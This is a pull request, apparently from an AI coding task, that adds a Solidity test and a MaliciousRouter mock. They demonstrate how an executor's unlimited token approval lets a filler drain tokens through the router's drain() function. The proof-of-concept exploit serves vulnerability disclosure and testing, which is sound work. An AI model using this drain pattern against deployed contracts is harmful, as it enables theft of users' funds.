### PR TITLE
Add test for executor unlimited approval vulnerability

### DIFF
--- a/test/executors/ExecutorAllowanceAttack.t.sol
+++ b/test/executors/ExecutorAllowanceAttack.t.sol
@@ -1,0 +1,52 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {Test} from "forge-std/Test.sol";
+import {MultiFillerSwapRouter02Executor} from "../../src/sample-executors/MultiFillerSwapRouter02Executor.sol";
+import {MockERC20} from "../util/mock/MockERC20.sol";
+import {MaliciousRouter} from "../util/mock/MaliciousRouter.sol";
+import {IReactor} from "../../src/interfaces/IReactor.sol";
+import {ISwapRouter02} from "../../src/external/ISwapRouter02.sol";
+import {WETH} from "solmate/src/tokens/WETH.sol";
+import {ResolvedOrder} from "../../src/base/ReactorStructs.sol";
+
+contract ExecutorAllowanceAttackTest is Test {
+    MultiFillerSwapRouter02Executor executor;
+    MockERC20 token;
+    MaliciousRouter router;
+    WETH weth;
+    address filler = address(0xbeef);
+
+    function setUp() public {
+        token = new MockERC20("T", "T", 18);
+        weth = new WETH();
+        router = new MaliciousRouter(address(weth));
+        address[] memory callers = new address[](1);
+        callers[0] = filler;
+        executor = new MultiFillerSwapRouter02Executor(callers, IReactor(address(this)), address(this), ISwapRouter02(address(router)));
+    }
+
+    function testFillerCanDrainApprovedTokens() public {
+        // Initial callback to set unlimited approval
+        address[] memory approveSwap = new address[](1);
+        approveSwap[0] = address(token);
+        address[] memory approveReactor = new address[](0);
+        bytes[] memory data = new bytes[](0);
+        vm.prank(address(this));
+        executor.reactorCallback(new ResolvedOrder[](0), abi.encode(approveSwap, approveReactor, data));
+
+        // Allowance should be max
+        assertEq(token.allowance(address(executor), address(router)), type(uint256).max);
+
+        // Tokens accrue in executor
+        uint256 amount = 1 ether;
+        token.mint(address(executor), amount);
+
+        // Filler drains tokens via router
+        vm.prank(filler);
+        router.drain(address(token), address(executor), filler, amount);
+
+        assertEq(token.balanceOf(address(executor)), 0);
+        assertEq(token.balanceOf(filler), amount);
+    }
+}

--- a/test/util/mock/MaliciousRouter.sol
+++ b/test/util/mock/MaliciousRouter.sol
@@ -1,0 +1,22 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+pragma solidity ^0.8.0;
+
+import {ERC20} from "solmate/src/tokens/ERC20.sol";
+
+contract MaliciousRouter {
+    address public immutable WETH9;
+
+    constructor(address _weth) {
+        WETH9 = _weth;
+    }
+
+    // simple multicall that does nothing
+    function multicall(uint256, bytes[] calldata) external payable returns (bytes[] memory results) {
+        results = new bytes[](0);
+    }
+
+    // Drain tokens from a victim using the allowance
+    function drain(address token, address from, address to, uint256 amount) external {
+        ERC20(token).transferFrom(from, to, amount);
+    }
+}


### PR DESCRIPTION
## Summary
- demonstrate how a filler can make a malicious token gain unlimited allowance
- add `MaliciousRouter` mock used by the exploit test

## Testing
- `forge test --match-contract ExecutorAllowanceAttackTest -vvv`

------
https://chatgpt.com/codex/tasks/task_e_687d7362a8bc832d9e88254b42e4de5c